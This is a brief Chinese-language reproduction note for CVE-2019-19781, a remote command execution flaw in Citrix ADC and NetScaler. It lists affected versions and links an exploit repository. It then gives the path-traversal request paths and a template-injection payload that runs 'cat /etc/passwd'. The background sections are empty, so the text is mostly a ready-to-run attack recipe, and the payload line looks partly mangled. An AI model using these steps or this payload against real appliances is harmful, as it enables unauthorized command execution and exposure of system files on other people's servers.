(CVE-2019-19781)Citrix ADC&NetScaler 远程命令执行漏洞
一、漏洞简介
二、漏洞影响
13.x,12.1,12.0,11.1,10.5
三、复现过程
https://github.com/ianxtianxt/CVE-2019-19781
0x01
upload_xml (/vpn/../vpns/portal/scripts/newbm.pl)
0x02
Execute Command (/vpn/../vpns/portal/jas502n.xml)
Payload:
url=http://example.com&title=c&desc=[% http://template.new('BLOCK' = 'print `cat /etc/passwd`') %]